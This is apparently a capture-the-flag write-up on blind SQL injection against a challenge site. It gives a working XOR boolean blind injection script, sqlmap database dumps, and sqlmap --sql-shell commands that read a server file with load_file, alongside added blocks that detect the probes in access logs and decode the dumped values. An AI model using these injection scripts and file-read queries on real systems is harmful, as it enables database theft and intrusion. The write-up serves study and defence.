Notes on a SQL injection challenge with separated web and database servers (using sqlmap's sql-shell)

Fuzzing the parameter showed that a large set of symbols is filtered, but the login name shown for id=1 differs from the one shown for id=0.

That suggests XOR-based boolean blind SQL injection.

My script is attached below.

import requests

flag = ""
for i in range(1, 2000):
    # Binary-search the ASCII value of the i-th character over the printable range 32..127
    low = 32
    high = 128
    mid = (low + high) // 2
    while low < high:
        # id=1^(cond): when cond is true the XOR turns id into 0 and the page shows the other login name
        url = "http://*********/SQL%20Injection/?id=1^(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),{0},1))>{1})".format(i, mid)
        res = requests.get(url=url)
        if 'Taka' in res.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2

    # Landing on the boundary values means we have run past the end of the string
    if mid == 32 or mid == 127:
        break
    flag = flag + chr(mid)
    print(flag)

This recovered the table names.
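From the defender's side, the binary search above leaves a very recognisable trail: one client sending the same `id=1^(ascii(substr(...))>N)` request over and over with only the threshold N changing. The following detector is an added example, not part of the write-up; it assumes web-server logs in the common "combined" format, and the log lines in it are constructed to mirror the probe shape used above.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not taken from the challenge server). The first client repeats
# the XOR probe with different thresholds, as the binary search does; the second is normal traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /SQL%20Injection/?id=1%5E(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1,1))%3E80) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /SQL%20Injection/?id=1%5E(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1,1))%3E104) HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /SQL%20Injection/?id=1%5E(ascii(substr((select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),1,1))%3E116) HTTP/1.1" 200 498
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /SQL%20Injection/?id=1 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /SQL%20Injection/?id=0 HTTP/1.1" 200 498
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')
# A number, the XOR operator, then a parenthesised comparison that calls ascii()/substr() or embeds a SELECT.
XOR_PROBE_RE = re.compile(r'^\d+\^\(.*\b(ascii|substr|select)\b.*[<>=]\s*\d+\)?$', re.I)

def parse_line(line):
    """Split one combined-format line into client IP, path and percent-decoded query parameters."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # parse_qs splits each pair on the first '=' only, so 'table_schema=database()' stays inside the id value
    return {"ip": m.group("ip"), "path": parts.path, "params": parse_qs(parts.query)}

def probe_signature(value):
    """Collapse the numeric threshold so every step of one binary search maps to one signature."""
    return re.sub(r'\d+(\)?)$', r'N\1', value)

def detect(log_text):
    """Return {client_ip: Counter{(path, param, signature): hits}} for XOR-style boolean probes."""
    hits = defaultdict(Counter)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        for name, values in rec["params"].items():
            for v in values:
                if XOR_PROBE_RE.match(v):
                    hits[rec["ip"]][(rec["path"], name, probe_signature(v))] += 1
    return dict(hits)

def bursts(hits, threshold=3):
    """Clients that sent at least `threshold` probes sharing one signature (a search in progress)."""
    return sorted(ip for ip, c in hits.items() if max(c.values()) >= threshold)

if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    print(found)
    print("burst clients:", bursts(found))
```

Blocking the `^` operator alone is not a fix; the durable mitigation is a parameterised query for `id`, with this kind of log correlation as the detection layer behind it.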

Next, dump the column names:

id,name,Host,User,Select_priv,Insert_priv,Update_priv,Delete_priv,Create_priv,Drop_priv,Reload_priv,Shutdown_priv,Process_priv,File_priv,Grant_priv,References_priv,Index_priv,Alter_priv,Show_db_priv,Super_priv,Create_tmp_table_priv,Lock_tables_priv,Execute_priv,Repl_slave_priv,Repl_client_priv,Create_view_priv,Show_view_priv,Create_routine_priv,Alter_routine_priv,Create_user_priv,Event_priv,Trigger_priv,Create_tablespace_priv,ssl_type,ssl_cipher,x509_issuer,x509_subject,max_questions,max_updates,max_connections,max_user_connections,plugin,authentication_string,password_expired,password_last_changed,password_lifetime,account_locked,id,name,id,name,password

After a long run this produced a large pile of column names, none of which was the flag we wanted, so we switch to sqlmap to enumerate the tables.

available databases [14]:
[*] information_schema
[*] lts
[*] mysql
[*] performance_schema
[*] qhr
[*] qzw
[*] sys
[*] syy
[*] tempdb
[*] Weikl
[*] wry
[*] wzx
[*] youki
[*] yoursql

sqlmap found 14 databases.

Database: Weikl
[2 tables]
+----------------+
| user           |
| flag           |
+----------------+

Database: mysql
[18 tables]
+----------------+
| user           |
| columns_priv   |
| db             |
| engine_cost    |
| event          |
| func           |
| general_log    |
| help_keyword   |
| help_topic     |
| plugin         |
| proc           |
| procs_priv     |
| proxies_priv   |
| server_cost    |
| servers        |
| slow_log       |
| tables_priv    |
| time_zone      |
+----------------+

Database: sys
[12 tables]
+----------------+
| session        |
| version        |
| host_summary   |
| latest_file_io |
| metrics        |
| processlist    |
| sys_config     |
| user_summary   |
| x$host_summary |
| x$processlist  |
| x$session      |
| x$user_summary |
+----------------+

Database: syy
[1 table]
+----------------+
| usersql        |
+----------------+

Database: tempdb
[1 table]
+----------------+
| user           |
+----------------+

Database: wry
[1 table]
+----------------+
| dataform       |
+----------------+

Database: wzx
[1 table]
+----------------+
| id             |
+----------------+

Database: youki
[1 table]
+----------------+
| user           |
+----------------+

Database: yoursql
[1 table]
+----------------+
| flag           |
+----------------+

The table listing contains the `flag` tables we are after.

Query their contents:

Database: Weikl
Table: flag
[1 entry]
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| flag                                                                                                                                                                                                                                                                                               |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
| 0x253537253537253339253331253439253438253532253666253631253537253335253732253439253438253532253666253631253538253464253637253631253538253464253637253561253664253738253638253561253761253338253637253536253437253638253730253632253664253733253637253539253537253634253638253631253537253334253364 |
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+

Octal

Try converting it to a string.

I did the decoding in Burp Suite (BP).

URL decode

Base64 decode

Not this one; try the other table.

Database: yoursql
Table: flag
[1 entry]
+--------------------------------------------------------------------------------------------------------------------+
| flag                                                                                                               |
+--------------------------------------------------------------------------------------------------------------------+
| 0x466c616773206172652073746f726564206173207465787420756e646572207468652064617461626173652073746f726167652070617468 |
+--------------------------------------------------------------------------------------------------------------------+

This is obviously hex, so try converting the hex to a string.

Neither value is the flag.

But this one gives a hint.
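The two dumped values are layered encodings (a MySQL hex literal wrapping URL-encoded base64 in one case, plain text in the other). As an added example that is not part of the original write-up, this script peels those layers in the same order the author used in Burp and prints every intermediate step; the two constants are the values copied from the sqlmap output above.

```python
import base64
import binascii
from urllib.parse import unquote

# The two values sqlmap dumped from the `flag` tables above (copied from this write-up).
WEIKL_FLAG = ("0x253537253537253339253331253439253438253532253666253631253537253335253732"
              "253439253438253532253666253631253538253464253637253631253538253464253637"
              "253561253664253738253638253561253761253338253637253536253437253638253730"
              "253632253664253733253637253539253537253634253638253631253537253334253364")
YOURSQL_FLAG = ("0x466c616773206172652073746f726564206173207465787420756e6465722074686520"
                "64617461626173652073746f726167652070617468")

def mysql_hex_to_text(value):
    """Decode a MySQL 0x... literal, which is how sqlmap prints a binary/hex column."""
    if value[:2].lower() == "0x":
        value = value[2:]
    return binascii.unhexlify(value).decode("ascii")

def decode_layers(value):
    """Peel the encodings one at a time (hex literal, then URL-encoding, then base64)
    and return every intermediate string so each step can be checked by eye."""
    steps = [mysql_hex_to_text(value)]
    text = steps[-1]
    # Percent-escapes only count as a layer if decoding actually changed something.
    if "%" in text and unquote(text) != text:
        text = unquote(text)
        steps.append(text)
    # Strict base64 check: plain English with spaces fails the alphabet test, so the
    # hint sentence is left as-is while the decoy string is decoded one level further.
    try:
        steps.append(base64.b64decode(text, validate=True).decode("ascii"))
    except (binascii.Error, ValueError, UnicodeDecodeError):
        pass
    return steps

if __name__ == "__main__":
    for name, value in (("Weikl.flag", WEIKL_FLAG), ("yoursql.flag", YOURSQL_FLAG)):
        for depth, text in enumerate(decode_layers(value)):
            print(f"{name} layer {depth}: {text}")
```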

We infer that the flag is stored as a txt file under the database's storage path, so we turn to sqlmap's interactive shell.

Here we use --sql-shell, because --os-shell could not determine the site's absolute path and therefore could not be used.

>python3 sqlmap.py -u http://********/SQL%20Injection/?id=1 --sql-shell
 select @@datadir

This returns the database's storage path (its data directory).

Then read the file:

 select load_file('/var/lib/mysql/flag.txt')

This returns the flag; base64-decode its contents to get the final value.
